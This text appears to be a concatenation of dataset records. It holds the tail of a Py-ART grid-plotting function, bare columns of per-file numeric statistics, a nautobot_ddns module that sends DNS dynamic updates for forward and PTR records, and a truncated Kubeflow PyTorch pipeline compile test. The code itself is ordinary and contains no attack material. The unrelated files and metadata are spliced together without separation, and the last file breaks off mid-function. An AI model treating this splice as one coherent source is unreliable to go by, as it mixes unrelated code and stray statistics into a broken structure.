        figsize=[img_cfg.get('xsize', 10.), img_cfg.get('ysize', 5.)],
        dpi=dpi)
    ax = fig.add_subplot(111, aspect='equal')
    display = pyart.graph.GridMapDisplay(grid)
    display.plot_latlon_slice(
        field_name, coord1=coord1, coord2=coord2, norm=norm,
        colorbar_orient='vertical', ticks=ticks, ticklabs=ticklabs, fig=fig,
        ax=ax)
    for fname in fname_list:
        fig.savefig(fname, dpi=dpi)
    plt.close(fig)
| 34.77459
| 78
| 0.604243
| 2,080
| 16,970
| 4.808173
| 0.117308
| 0.025197
| 0.053995
| 0.014999
| 0.812419
| 0.79702
| 0.780422
| 0.762424
| 0.756024
| 0.746325
| 0
| 0.012911
| 0.287979
| 16,970
| 487
| 79
| 34.845996
| 0.814781
| 0.244196
| 0
| 0.736434
| 1
| 0
| 0.106802
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01938
| false
| 0
| 0.031008
| 0
| 0.065891
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b9492109c95f7adf7b561b2bb0cc2e2ad1960312
| 6,953
|
py
|
Python
|
nautobot_ddns/background_tasks.py
|
jakubjastrabik/nautobot_DDNS
|
6067430001e7b325c8c85ac2fe207899bad141d2
|
[
"Apache-2.0"
] | 3
|
2021-11-14T23:47:19.000Z
|
2022-01-25T18:37:07.000Z
|
nautobot_ddns/background_tasks.py
|
jakubjastrabik/nautobot_DDNS
|
6067430001e7b325c8c85ac2fe207899bad141d2
|
[
"Apache-2.0"
] | null | null | null |
nautobot_ddns/background_tasks.py
|
jakubjastrabik/nautobot_DDNS
|
6067430001e7b325c8c85ac2fe207899bad141d2
|
[
"Apache-2.0"
] | 1
|
2021-11-14T23:47:22.000Z
|
2021-11-14T23:47:22.000Z
|
import logging
from typing import List, Optional
import dns.query
import dns.rdatatype
import dns.resolver
from django.db import IntegrityError
from django_rq import job
from dns import rcode
from netaddr import ip
from nautobot_ddns.models import ACTION_CREATE, ACTION_DELETE, DNSStatus, RCODE_NO_ZONE, ReverseZone, Zone
from nautobot_ddns.utils import get_soa
# Module-wide logger, named after the plugin package.
logger = logging.getLogger('nautobot_ddns')
def status_update(output: List[str], operation: str, response) -> None:
    """Log the outcome of a DNS update *response* and append it to *output*."""
    code = response.rcode()
    if code != dns.rcode.NOERROR:
        message = f"{operation} failed: {dns.rcode.to_text(code)}"
        logger.error(message)
    else:
        message = f"{operation} successful"
        logger.info(message)
    output.append(message)
def create_forward(dns_name: str, address: ip.IPAddress, status: Optional[DNSStatus], output: List[str]):
    """Add an A/AAAA record for *dns_name* -> *address* in its forward zone."""
    if status:
        status.forward_action = ACTION_CREATE
    zone = Zone.objects.find_for_dns_name(dns_name)
    if not zone:
        logger.debug(f"No zone found for {dns_name}")
        if status:
            status.forward_rcode = RCODE_NO_ZONE
        return
    logger.debug(f"Found zone {zone.name} for {dns_name}")
    # Check the SOA, we don't want to write to a parent zone if it has delegated authority
    soa = get_soa(dns_name)
    if soa != zone.name:
        logger.warning(f"Can't update zone {zone.name} for {dns_name}, "
                       f"it has delegated authority for {soa}")
        if status:
            status.forward_rcode = rcode.NOTAUTH
        return
    record_type = 'A' if address.version == 4 else 'AAAA'
    update = zone.server.create_update(zone.name)
    update.add(dns_name, zone.ttl, record_type, str(address))
    response = dns.query.udp(update, zone.server.address)
    status_update(output, f'Adding {dns_name} {record_type} {address}', response)
    if status:
        status.forward_rcode = response.rcode()
def delete_forward(dns_name: str, address: ip.IPAddress, status: Optional[DNSStatus], output: List[str]):
    """Remove the A/AAAA record for *dns_name* -> *address* from its forward zone.

    Mirrors create_forward: looks up the forward zone, verifies authority via
    the SOA, sends a dynamic delete, then records the resulting rcode on
    *status* (when given) and a human-readable line in *output*.
    """
    if status:
        status.forward_action = ACTION_DELETE
    zone = Zone.objects.find_for_dns_name(dns_name)
    if zone:
        logger.debug(f"Found zone {zone.name} for {dns_name}")
        # Check the SOA, we don't want to write to a parent zone if it has delegated authority
        soa = get_soa(dns_name)
        if soa == zone.name:
            record_type = 'A' if address.version == 4 else 'AAAA'
            update = zone.server.create_update(zone.name)
            update.delete(
                dns_name,
                record_type,
                str(address)
            )
            response = dns.query.udp(update, zone.server.address)
            status_update(output, f'Deleting {dns_name} {record_type} {address}', response)
            if status:
                status.forward_rcode = response.rcode()
        else:
            # Message fixed to include "for", matching the wording used by
            # create_forward/create_reverse/delete_reverse.
            logger.warning(f"Can't update zone {zone.name} for {dns_name}, "
                           f"it has delegated authority for {soa}")
            if status:
                status.forward_rcode = rcode.NOTAUTH
    else:
        logger.debug(f"No zone found for {dns_name}")
        if status:
            status.forward_rcode = RCODE_NO_ZONE
def create_reverse(dns_name: str, address: ip.IPAddress, status: Optional[DNSStatus], output: List[str]):
    """Add a PTR record mapping *address* back to *dns_name* in its reverse zone."""
    if status:
        status.reverse_action = ACTION_CREATE
    zone = ReverseZone.objects.find_for_address(address)
    if not zone:
        logger.debug(f"No zone found for {address}")
        if status:
            status.reverse_rcode = RCODE_NO_ZONE
        return
    record_name = zone.record_name(address)
    logger.debug(f"Found zone {zone.name} for {record_name}")
    # Check the SOA, we don't want to write to a parent zone if it has delegated authority
    soa = get_soa(record_name)
    if soa != zone.name:
        logger.warning(f"Can't update zone {zone.name} for {record_name}, "
                       f"it has delegated authority for {soa}")
        if status:
            status.reverse_rcode = rcode.NOTAUTH
        return
    update = zone.server.create_update(zone.name)
    update.add(record_name, zone.ttl, 'ptr', dns_name)
    response = dns.query.udp(update, zone.server.address)
    status_update(output, f'Adding {record_name} PTR {dns_name}', response)
    if status:
        status.reverse_rcode = response.rcode()
def delete_reverse(dns_name: str, address: ip.IPAddress, status: Optional[DNSStatus], output: List[str]):
    """Remove the reverse (PTR) record for *address* from its reverse zone.

    Records the attempted action and resulting rcode on *status* (when
    supplied) and appends a human-readable summary line to *output*.
    """
    if status:
        status.reverse_action = ACTION_DELETE
    zone = ReverseZone.objects.find_for_address(address)
    if not zone:
        logger.debug(f"No zone found for {address}")
        if status:
            status.reverse_rcode = RCODE_NO_ZONE
        return
    record_name = zone.record_name(address)
    logger.debug(f"Found zone {zone.name} for {record_name}")
    # Check the SOA, we don't want to write to a parent zone if it has delegated authority
    soa = get_soa(record_name)
    if soa != zone.name:
        logger.warning(f"Can't update zone {zone.name} for {record_name}, "
                       f"it has delegated authority for {soa}")
        if status:
            status.reverse_rcode = rcode.NOTAUTH
        return
    update = zone.server.create_update(zone.name)
    update.delete(record_name, 'ptr', dns_name)
    response = dns.query.udp(update, zone.server.address)
    status_update(output, f'Deleting {record_name} PTR {dns_name}', response)
    if status:
        status.reverse_rcode = response.rcode()
@job
def dns_create(dns_name: str, address: ip.IPAddress, forward=True, reverse=True,
               status: Optional[DNSStatus] = None):
    """Create forward (A/AAAA) and/or reverse (PTR) DNS records for a host.

    Args:
        dns_name: fully qualified host name to register.
        address: IP address the records should refer to.
        forward: when true, create the forward record.
        reverse: when true, create the reverse (PTR) record.
        status: optional DNSStatus on which the attempted actions and
            resulting rcodes are recorded and then persisted.

    Returns:
        A comma-separated summary of the updates that were attempted.
    """
    # Fix: the annotation was `status: DNSStatus = None`, an implicit
    # Optional, which PEP 484 disallows; `Optional[DNSStatus]` is explicit
    # and changes nothing for callers.
    output: List[str] = []
    if forward:
        create_forward(dns_name, address, status, output)
    if reverse:
        create_reverse(dns_name, address, status, output)
    if status:
        try:
            status.save()
        except IntegrityError:
            # Another worker may have inserted the same row concurrently;
            # fall back to updating the existing one.
            status.save(force_update=True)
    return ', '.join(output)
@job
def dns_delete(dns_name: str, address: ip.IPAddress, forward=True, reverse=True,
               status: Optional[DNSStatus] = None):
    """Delete forward (A/AAAA) and/or reverse (PTR) DNS records for a host.

    Args:
        dns_name: fully qualified host name whose records are removed.
        address: IP address the records refer to.
        forward: when true, delete the forward record.
        reverse: when true, delete the reverse (PTR) record.
        status: optional DNSStatus on which the attempted actions and
            resulting rcodes are recorded and then persisted.

    Returns:
        A comma-separated summary of the updates that were attempted.
    """
    # Fix: `status: DNSStatus = None` was an implicit Optional (disallowed
    # by PEP 484); made explicit, no caller-visible change.
    output: List[str] = []
    if forward:
        delete_forward(dns_name, address, status, output)
    if reverse:
        delete_reverse(dns_name, address, status, output)
    if status:
        try:
            status.save()
        except IntegrityError:
            # Another worker may have inserted the same row concurrently;
            # fall back to updating the existing one.
            status.save(force_update=True)
    return ', '.join(output)
| 34.765
| 107
| 0.605494
| 861
| 6,953
| 4.749129
| 0.119628
| 0.051357
| 0.054781
| 0.041086
| 0.833456
| 0.833456
| 0.827342
| 0.827342
| 0.806799
| 0.802397
| 0
| 0.000412
| 0.30174
| 6,953
| 200
| 108
| 34.765
| 0.841813
| 0.057385
| 0
| 0.726708
| 0
| 0
| 0.129811
| 0.003818
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0
| 0.068323
| 0
| 0.124224
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b956c06f63b4e768d5d871a9524b57a459282b65
| 32,906
|
py
|
Python
|
components/PyTorch/pytorch-kfp-components/tests/test_compile_yamls.py
|
nostro-im/pipelines
|
39f5b6b74040abbf4b764cbd5b422d7548723d9e
|
[
"Apache-2.0"
] | 2,860
|
2018-05-24T04:55:01.000Z
|
2022-03-31T13:49:56.000Z
|
components/PyTorch/pytorch-kfp-components/tests/test_compile_yamls.py
|
nostro-im/pipelines
|
39f5b6b74040abbf4b764cbd5b422d7548723d9e
|
[
"Apache-2.0"
] | 7,331
|
2018-05-16T09:03:26.000Z
|
2022-03-31T23:22:04.000Z
|
components/PyTorch/pytorch-kfp-components/tests/test_compile_yamls.py
|
nostro-im/pipelines
|
39f5b6b74040abbf4b764cbd5b422d7548723d9e
|
[
"Apache-2.0"
] | 1,359
|
2018-05-15T11:05:41.000Z
|
2022-03-31T09:42:09.000Z
|
#!/usr/bin/env/python3
#
# Copyright (c) Facebook, Inc. and its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#pylint: disable=not-callable,unused-variable
"""Test for component compilation."""
import os
import unittest
import json
import pytest
from kfp import components
from kfp.components import load_component_from_file
from kfp import dsl
from kfp import compiler
# Locate the "templates" directory (sibling of this tests directory) that
# holds the component YAML definitions compiled by these tests.
tests_dir, _ = os.path.split(os.path.abspath(__file__))
templates_dir = os.path.join(os.path.dirname(tests_dir), "templates")

# NOTE: all components below are loaded from YAML at import time, so a
# missing/invalid template fails module import rather than an individual test.
# Bert pipeline components: preprocessing and training steps.
BERT_COMPONENTS = {
    "component_bert_prep":
        components.load_component_from_file(f"{templates_dir}/preprocess_component.yaml"),
    "component_bert_train":
        components.load_component_from_file(f"{templates_dir}/train_component.yaml"),
}
# Cifar10 pipeline components — same template files as the bert set,
# registered under cifar-specific keys.
CIFAR_COMPONENTS = {
    "component_cifar10_prep":
        components.load_component_from_file(f"{templates_dir}/preprocess_component.yaml"),
    "component_cifar10_train":
        components.load_component_from_file(f"{templates_dir}/train_component.yaml"),
}
# Shared single-step components used by both pipelines.
COMPONENT_TB = load_component_from_file(
    f"{templates_dir}/tensorboard_component.yaml"
)
COMPONENT_DEPLOY = load_component_from_file(
    f"{templates_dir}/deploy_component.yaml"
)
COMPONENT_MNIO = components.load_component_from_file(
    f"{templates_dir}/minio_component.yaml"
)
PRED_OP = load_component_from_file(f"{templates_dir}/prediction_component.yaml")
class ComponentCompileTest(unittest.TestCase): #pylint: disable=too-many-instance-attributes
"""Test cases for compilation of yamls."""
    def setUp(self):
        """Initialize per-test fixture values used when building pipelines."""
        super().setUp()
        # Input payload used by the prediction/explanation steps.
        self.input_request = "./compile_test.json"
        self.deploy_name_bert = "bertserve"
        self.namespace = "kubeflow-user-example-com"
        self.experiment = "Default"
        # In-cluster MinIO endpoint and bucket for logs/artifacts.
        self.minio_endpoint = "http://minio-service.kubeflow:9000"
        self.log_bucket = "mlpipeline"
        self.tensorboard_image = "public.ecr.aws/pytorch-samples/tboard:latest"
        self.deploy_name_cifar = "torchserve"
        self.model_name = "cifar10"
        # Host name of the cifar InferenceService: "<deploy>.<namespace>.example.com".
        self.isvc_name = (
            self.deploy_name_cifar + "." + self.namespace + "." + "example.com"
        )
        # Session cookie is intentionally empty for these compile-only tests.
        self.cookie = ""
        self.ingress_gateway = (
            "http://istio-ingressgateway.istio-system.svc.cluster.local"
        )
def test_cifar10_compile(self):
"""Test Cifar10 yamls compile."""
@dsl.pipeline(
name="Training Cifar10 pipeline",
description="Cifar 10 dataset pipeline",
) #pylint: disable=too-many-arguments,too-many-locals
def pytorch_cifar10(
minio_endpoint=self.minio_endpoint,
log_bucket=self.log_bucket,
log_dir=f"tensorboard/logs/{dsl.RUN_ID_PLACEHOLDER}",
mar_path=f"mar/{dsl.RUN_ID_PLACEHOLDER}/model-store",
config_prop_path=f"mar/{dsl.RUN_ID_PLACEHOLDER}/config",
model_uri=f"s3://mlpipeline/mar/{dsl.RUN_ID_PLACEHOLDER}",
tf_image=self.tensorboard_image,
deploy=self.deploy_name_cifar,
namespace=self.namespace,
confusion_matrix_log_dir=f"confusion_matrix"
f"/{dsl.RUN_ID_PLACEHOLDER}/",
checkpoint_dir="checkpoint_dir/cifar10",
):
"""Cifar10 pipelines."""
pod_template_spec = json.dumps({
"spec": {
"containers": [{
"env": [
{
"name": "AWS_ACCESS_KEY_ID",
"valueFrom": {
"secretKeyRef": {
"name": "mlpipeline-minio-artifact",
"key": "accesskey",
}
},
},
{
"name": "AWS_SECRET_ACCESS_KEY",
"valueFrom": {
"secretKeyRef": {
"name": "mlpipeline-minio-artifact",
"key": "secretkey",
}
},
},
{
"name": "AWS_REGION",
"value": "minio"
},
{
"name": "S3_ENDPOINT",
"value": f"{minio_endpoint}",
},
{
"name": "S3_USE_HTTPS",
"value": "0"
},
{
"name": "S3_VERIFY_SSL",
"value": "0"
},
]
}]
}
})
prepare_tb_task = COMPONENT_TB(
log_dir_uri=f"s3://{log_bucket}/{log_dir}",
image=tf_image,
pod_template_spec=pod_template_spec,
).set_display_name("Visualization")
component_cifar10_prep = CIFAR_COMPONENTS["component_cifar10_prep"]
prep_task = (
component_cifar10_prep().after(prepare_tb_task).
set_display_name("Preprocess & Transform")
)
component_cifar10_train = CIFAR_COMPONENTS["component_cifar10_train"
]
confusion_matrix_url = \
f"minio://{log_bucket}/{confusion_matrix_log_dir}"
script_args = f"model_name=resnet.pth," \
f"confusion_matrix_url={confusion_matrix_url}"
# For gpus, set number of gpus and accelerator type
ptl_args = "max_epochs=1, " \
"gpus=0, " \
"accelerator=None, " \
"profiler=pytorch"
train_task = (
component_cifar10_train(
input_data=prep_task.outputs["output_data"],
script_args=script_args,
ptl_arguments=ptl_args
).after(prep_task).set_display_name("Training")
)
minio_tb_upload = (
COMPONENT_MNIO(
bucket_name="mlpipeline",
folder_name=log_dir,
input_path=train_task.outputs["tensorboard_root"],
filename="",
).after(train_task
).set_display_name("Tensorboard Events Pusher")
)
minio_checkpoint_dir_upload = (
COMPONENT_MNIO(
bucket_name="mlpipeline",
folder_name=checkpoint_dir,
input_path=train_task.outputs["checkpoint_dir"],
filename="",
).after(train_task).set_display_name("checkpoint_dir Pusher")
)
minio_mar_upload = (
COMPONENT_MNIO(
bucket_name="mlpipeline",
folder_name=mar_path,
input_path=train_task.outputs["checkpoint_dir"],
filename="cifar10_test.mar",
).after(train_task).set_display_name("Mar Pusher")
)
minio_config_upload = (
COMPONENT_MNIO(
bucket_name="mlpipeline",
folder_name=config_prop_path,
input_path=train_task.outputs["checkpoint_dir"],
filename="config.properties",
).after(train_task).set_display_name("Conifg Pusher")
)
model_uri = str(model_uri)
isvc_yaml = """
apiVersion: "serving.kubeflow.org/v1beta1"
kind: "InferenceService"
metadata:
name: {}
namespace: {}
spec:
predictor:
serviceAccountName: sa
pytorch:
storageUri: {}
resources:
limits:
memory: 4Gi
""".format(deploy, namespace, model_uri)
# For GPU inference use below yaml with gpu count and accelerator
gpu_count = "1"
accelerator = "nvidia-tesla-p4"
isvc_gpu_yaml = """
apiVersion: "serving.kubeflow.org/v1beta1"
kind: "InferenceService"
metadata:
name: {}
namespace: {}
spec:
predictor:
serviceAccountName: sa
pytorch:
storageUri: {}
resources:
limits:
memory: 4Gi
nvidia.com/gpu: {}
nodeSelector:
cloud.google.com/gke-accelerator: {}
""".format(deploy, namespace, model_uri, gpu_count, accelerator)
# Update inferenceservice_yaml for GPU inference
deploy_task = (
COMPONENT_DEPLOY(
action="apply", inferenceservice_yaml=isvc_yaml
).after(minio_mar_upload).set_display_name("Deployer")
)
pred_task = (
PRED_OP(
host_name=self.isvc_name,
input_request=self.input_request,
cookie=self.cookie,
url=self.ingress_gateway,
model=self.model_name,
inference_type="predict",
).after(deploy_task).set_display_name("Prediction")
)
explain_task = (
PRED_OP(
host_name=self.isvc_name,
input_request=self.input_request,
cookie=self.cookie,
url=self.ingress_gateway,
model=self.model_name,
inference_type="explain",
).after(pred_task).set_display_name("Explanation")
)
compiler.Compiler().compile(
pytorch_cifar10, "pytorch.tar.gz", type_check=True
)
def test_bert_compile(self):
"""Test bert yamls compilation."""
@dsl.pipeline(
name="Training pipeline", description="Sample training job test"
) #pylint: disable=too-many-arguments,too-many-locals
def pytorch_bert(
minio_endpoint=self.minio_endpoint,
log_bucket=self.log_bucket,
log_dir=f"tensorboard/logs/{dsl.RUN_ID_PLACEHOLDER}",
mar_path=f"mar/{dsl.RUN_ID_PLACEHOLDER}/model-store",
config_prop_path=f"mar/{dsl.RUN_ID_PLACEHOLDER}/config",
model_uri=f"s3://mlpipeline/mar/{dsl.RUN_ID_PLACEHOLDER}",
tf_image=self.tensorboard_image,
deploy=self.deploy_name_bert,
namespace=self.namespace,
confusion_matrix_log_dir=
f"confusion_matrix/{dsl.RUN_ID_PLACEHOLDER}/",
num_samples=1000,
max_epochs=1
):
"""Bert Pipeline."""
prepare_tb_task = COMPONENT_TB(
log_dir_uri=f"s3://{log_bucket}/{log_dir}",
image=tf_image,
pod_template_spec=json.dumps({
"spec": {
"containers": [{
"env": [
{
"name": "AWS_ACCESS_KEY_ID",
"valueFrom": {
"secretKeyRef": {
"name": "mlpipeline-minio-artifact",
"key": "accesskey",
}
},
},
{
"name": "AWS_SECRET_ACCESS_KEY",
"valueFrom": {
"secretKeyRef": {
"name": "mlpipeline-minio-artifact",
"key": "secretkey",
}
},
},
{
"name": "AWS_REGION",
"value": "minio",
},
{
"name": "S3_ENDPOINT",
"value": f"{minio_endpoint}",
},
{
"name": "S3_USE_HTTPS",
"value": "0"
},
{
"name": "S3_VERIFY_SSL",
"value": "0"
},
]
}]
}
}),
).set_display_name("Visualization")
component_bert_prep = BERT_COMPONENTS["component_bert_prep"]
prep_task = (
component_bert_prep().after(prepare_tb_task).
set_display_name("Preprocess & Transform")
)
component_bert_train = BERT_COMPONENTS["component_bert_train"]
confusion_matrix_url = \
f"minio://{log_bucket}/{confusion_matrix_log_dir}"
script_args = f"model_name=bert.pth," \
f"num_samples={num_samples}," \
f"confusion_matrix_url={confusion_matrix_url}"
# For gpus, set number of gpus and accelerator type
ptl_args = f"max_epochs={max_epochs}," \
"profiler=pytorch," \
"gpus=0," \
"accelerator=None"
train_task = (
component_bert_train(
input_data=prep_task.outputs["output_data"],
script_args=script_args,
ptl_arguments=ptl_args
).after(prep_task).set_display_name("Training")
)
minio_tb_upload = (
COMPONENT_MNIO(
bucket_name="mlpipeline",
folder_name=log_dir,
input_path=train_task.outputs["tensorboard_root"],
filename="",
).after(train_task
).set_display_name("Tensorboard Events Pusher")
)
minio_mar_upload = (
COMPONENT_MNIO(
bucket_name="mlpipeline",
folder_name=mar_path,
input_path=train_task.outputs["checkpoint_dir"],
filename="bert_test.mar",
).after(train_task).set_display_name("Mar Pusher")
)
minio_config_upload = (
COMPONENT_MNIO(
bucket_name="mlpipeline",
folder_name=config_prop_path,
input_path=train_task.outputs["checkpoint_dir"],
filename="config.properties",
).after(train_task).set_display_name("Conifg Pusher")
)
model_uri = str(model_uri)
isvc_yaml = """
apiVersion: "serving.kubeflow.org/v1beta1"
kind: "InferenceService"
metadata:
name: {}
namespace: {}
spec:
predictor:
serviceAccountName: sa
pytorch:
storageUri: {}
resources:
limits:
memory: 4Gi
""".format(deploy, namespace, model_uri)
# For GPU inference use below yaml with gpu count and accelerator
gpu_count = "1"
accelerator = "nvidia-tesla-p4"
isvc_gpu_yaml = """
apiVersion: "serving.kubeflow.org/v1beta1"
kind: "InferenceService"
metadata:
name: {}
namespace: {}
spec:
predictor:
serviceAccountName: sa
pytorch:
storageUri: {}
resources:
limits:
memory: 4Gi
nvidia.com/gpu: {}
nodeSelector:
cloud.google.com/gke-accelerator: {}
""".format(deploy, namespace, model_uri, gpu_count, accelerator)
# Update inferenceservice_yaml for GPU inference
deploy_task = (
COMPONENT_DEPLOY(
action="apply", inferenceservice_yaml=isvc_yaml
).after(minio_mar_upload).set_display_name("Deployer")
)
compiler.Compiler().compile(
pytorch_bert, "pytorch.tar.gz", type_check=True
)
def test_cifar10_compile_fail(self):
"""Test Cifar10 yamls compile."""
@dsl.pipeline(
name="Training Cifar10 pipeline",
description="Cifar 10 dataset pipeline",
) #pylint: disable=too-many-arguments,too-many-locals
def pytorch_cifar10(
minio_endpoint=self.minio_endpoint,
log_bucket=self.log_bucket,
log_dir=f"tensorboard/logs/{dsl.RUN_ID_PLACEHOLDER}",
mar_path=f"mar/{dsl.RUN_ID_PLACEHOLDER}/model-store",
config_prop_path=f"mar/{dsl.RUN_ID_PLACEHOLDER}/config",
model_uri=f"s3://mlpipeline/mar/{dsl.RUN_ID_PLACEHOLDER}",
tf_image=self.tensorboard_image,
deploy=self.deploy_name_cifar,
namespace=self.namespace,
confusion_matrix_log_dir=f"confusion_matrix"
f"/{dsl.RUN_ID_PLACEHOLDER}/", #pylint: disable=f-string-without-interpolation
checkpoint_dir=f"checkpoint_dir/cifar10",
):
"""Cifar10 pipelines."""
pod_template_spec = json.dumps({
"spec": {
"containers": [{
"env": [
{
"name": "AWS_ACCESS_KEY_ID",
"valueFrom": {
"secretKeyRef": {
"name": "mlpipeline-minio-artifact",
"key": "accesskey",
}
},
},
{
"name": "AWS_SECRET_ACCESS_KEY",
"valueFrom": {
"secretKeyRef": {
"name": "mlpipeline-minio-artifact",
"key": "secretkey",
}
},
},
{
"name": "AWS_REGION",
"value": "minio"
},
{
"name": "S3_ENDPOINT",
"value": f"{minio_endpoint}",
},
{
"name": "S3_USE_HTTPS",
"value": "0"
},
{
"name": "S3_VERIFY_SSL",
"value": "0"
},
]
}]
}
})
prepare_tb_task = COMPONENT_TB(
log_dir_uri=f"s3://{log_bucket}/{log_dir}",
image=tf_image,
pod_template_spec=pod_template_spec,
).set_display_name("Visualization")
component_cifar10_prep = ""
prep_task = (
component_cifar10_prep().after(prepare_tb_task).
set_display_name("Preprocess & Transform")
)
confusion_matrix_url = \
f"minio://{log_bucket}/{confusion_matrix_log_dir}"
script_args = f"model_name=resnet.pth," \
f"confusion_matrix_url={confusion_matrix_url}"
# For gpus, set number of gpus and accelerator type
ptl_args = "max_epochs=1, " \
"gpus=0, " \
"accelerator=None, " \
"profiler=pytorch"
component_cifar10_train = ""
train_task = (
component_cifar10_train(
input_data=prep_task.outputs["output_data"],
script_args=script_args,
ptl_arguments=ptl_args
).after(prep_task).set_display_name("Training")
)
minio_tb_upload = (
COMPONENT_MNIO(
bucket_name="mlpipeline",
folder_name=log_dir,
input_path=train_task.outputs["tensorboard_root"],
filename="",
).after(train_task
).set_display_name("Tensorboard Events Pusher")
)
minio_checkpoint_dir_upload = (
COMPONENT_MNIO(
bucket_name="mlpipeline",
folder_name=checkpoint_dir,
input_path=train_task.outputs["checkpoint_dir"],
filename="",
).after(train_task).set_display_name("checkpoint_dir Pusher")
)
minio_mar_upload = (
COMPONENT_MNIO(
bucket_name="mlpipeline",
folder_name=mar_path,
input_path=train_task.outputs["checkpoint_dir"],
filename="cifar10_test.mar",
).after(train_task).set_display_name("Mar Pusher")
)
minio_config_upload = (
COMPONENT_MNIO(
bucket_name="mlpipeline",
folder_name=config_prop_path,
input_path=train_task.outputs["checkpoint_dir"],
filename="config.properties",
).after(train_task).set_display_name("Conifg Pusher")
)
model_uri = str(model_uri)
isvc_yaml = """
apiVersion: "serving.kubeflow.org/v1beta1"
kind: "InferenceService"
metadata:
name: {}
namespace: {}
spec:
predictor:
serviceAccountName: sa
pytorch:
storageUri: {}
resources:
limits:
memory: 4Gi
""".format(deploy, namespace, model_uri)
# For GPU inference use below yaml with gpu count and accelerator
gpu_count = "1"
accelerator = "nvidia-tesla-p4"
isvc_gpu_yaml = """
apiVersion: "serving.kubeflow.org/v1beta1"
kind: "InferenceService"
metadata:
name: {}
namespace: {}
spec:
predictor:
serviceAccountName: sa
pytorch:
storageUri: {}
resources:
limits:
memory: 4Gi
nvidia.com/gpu: {}
nodeSelector:
cloud.google.com/gke-accelerator: {}
""".format(deploy, namespace, model_uri, gpu_count, accelerator)
# Update inferenceservice_yaml for GPU inference
deploy_task = (
COMPONENT_DEPLOY(
action="apply", inferenceservice_yaml=isvc_yaml
).after(minio_mar_upload).set_display_name("Deployer")
)
pred_task = (
PRED_OP(
host_name=self.isvc_name,
input_request=self.input_request,
cookie=self.cookie,
url=self.ingress_gateway,
model=self.model_name,
inference_type="predict",
).after(deploy_task).set_display_name("Prediction")
)
explain_task = (
PRED_OP(
host_name=self.isvc_name,
input_request=self.input_request,
cookie=self.cookie,
url=self.ingress_gateway,
model=self.model_name,
inference_type="explain",
).after(pred_task).set_display_name("Explanation")
)
with pytest.raises(TypeError):
compiler.Compiler().compile(
pytorch_cifar10, "pytorch.tar.gz", type_check=True
)
def test_bert_compile_fail(self):
"""Test bert yamls compilation."""
@dsl.pipeline(
name="Training pipeline", description="Sample training job test"
) #pylint: disable=too-many-arguments,too-many-locals
def pytorch_bert(
minio_endpoint=self.minio_endpoint,
log_bucket=self.log_bucket,
log_dir=f"tensorboard/logs/{dsl.RUN_ID_PLACEHOLDER}",
mar_path=f"mar/{dsl.RUN_ID_PLACEHOLDER}/model-store",
config_prop_path=f"mar/{dsl.RUN_ID_PLACEHOLDER}/config",
model_uri=f"s3://mlpipeline/mar/{dsl.RUN_ID_PLACEHOLDER}",
tf_image=self.tensorboard_image,
deploy=self.deploy_name_bert,
namespace=self.namespace,
confusion_matrix_log_dir=
f"confusion_matrix/{dsl.RUN_ID_PLACEHOLDER}/",
num_samples=1000,
max_epochs=1
):
"""Bert Pipeline."""
prepare_tb_task = COMPONENT_TB(
log_dir_uri=f"s3://{log_bucket}/{log_dir}",
image=tf_image,
pod_template_spec=json.dumps({
"spec": {
"containers": [{
"env": [
{
"name": "AWS_ACCESS_KEY_ID",
"valueFrom": {
"secretKeyRef": {
"name": "mlpipeline-minio-artifact",
"key": "accesskey",
}
},
},
{
"name": "AWS_SECRET_ACCESS_KEY",
"valueFrom": {
"secretKeyRef": {
"name": "mlpipeline-minio-artifact",
"key": "secretkey",
}
},
},
{
"name": "AWS_REGION",
"value": "minio",
},
{
"name": "S3_ENDPOINT",
"value": f"{minio_endpoint}",
},
{
"name": "S3_USE_HTTPS",
"value": "0"
},
{
"name": "S3_VERIFY_SSL",
"value": "0"
},
]
}]
}
}),
).set_display_name("Visualization")
component_bert_prep = ""
prep_task = (
component_bert_prep().after(prepare_tb_task).
set_display_name("Preprocess & Transform")
)
confusion_matrix_url = \
f"minio://{log_bucket}/{confusion_matrix_log_dir}"
script_args = f"model_name=bert.pth," \
f"num_samples={num_samples}," \
f"confusion_matrix_url={confusion_matrix_url}"
# For gpus, set number of gpus and accelerator type
ptl_args = f"max_epochs={max_epochs}," \
"profiler=pytorch," \
"gpus=0," \
"accelerator=None"
component_bert_train = ""
train_task = (
component_bert_train(
input_data=prep_task.outputs["output_data"],
script_args=script_args,
ptl_arguments=ptl_args
).after(prep_task).set_display_name("Training")
)
minio_tb_upload = (
COMPONENT_MNIO(
bucket_name="mlpipeline",
folder_name=log_dir,
input_path=train_task.outputs["tensorboard_root"],
filename="",
).after(train_task
).set_display_name("Tensorboard Events Pusher")
)
minio_mar_upload = (
COMPONENT_MNIO(
bucket_name="mlpipeline",
folder_name=mar_path,
input_path=train_task.outputs["checkpoint_dir"],
filename="bert_test.mar",
).after(train_task).set_display_name("Mar Pusher")
)
minio_config_upload = (
COMPONENT_MNIO(
bucket_name="mlpipeline",
folder_name=config_prop_path,
input_path=train_task.outputs["checkpoint_dir"],
filename="config.properties",
).after(train_task).set_display_name("Conifg Pusher")
)
model_uri = str(model_uri)
isvc_yaml = """
apiVersion: "serving.kubeflow.org/v1beta1"
kind: "InferenceService"
metadata:
name: {}
namespace: {}
spec:
predictor:
serviceAccountName: sa
pytorch:
storageUri: {}
resources:
limits:
memory: 4Gi
""".format(deploy, namespace, model_uri)
# For GPU inference use below yaml with gpu count and accelerator
gpu_count = "1"
